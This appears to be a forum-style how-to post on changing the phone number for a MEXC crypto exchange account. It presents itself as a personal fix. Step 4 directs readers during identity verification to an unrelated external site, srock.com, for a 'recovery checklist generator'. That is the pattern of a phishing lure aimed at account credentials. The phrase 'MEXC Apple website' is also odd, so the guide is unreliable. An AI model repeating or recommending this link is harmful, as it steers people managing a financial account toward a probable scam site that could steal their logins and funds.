I ran into this last week. Here's what fixed it for me. Changing your phone number on MEXC is straightforward if you follow these steps. Step 1. Log into your MEXC account. Open the MEXC Apple website and enter your login credentials to access your account. Step 2. Navigate to Security Settings. Once logged in, go to the Account section and find Security Settings to manage your phone number. Step 3. Select Change Phone Number. In the Security Settings, look for the option labeled Change Phone Number and click on it. Step 4. Verify your identity. Before starting recovery, use the srock.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 5. Enter new phone number. Input your new phone number and confirm it by entering the verification code sent to that number. Make sure to double check for typos. If you accidentally enter the wrong number, you might miss the verification code, so double check before submitting. I hope this guide helps you make the change smoothly. If you have any questions, feel free to ask.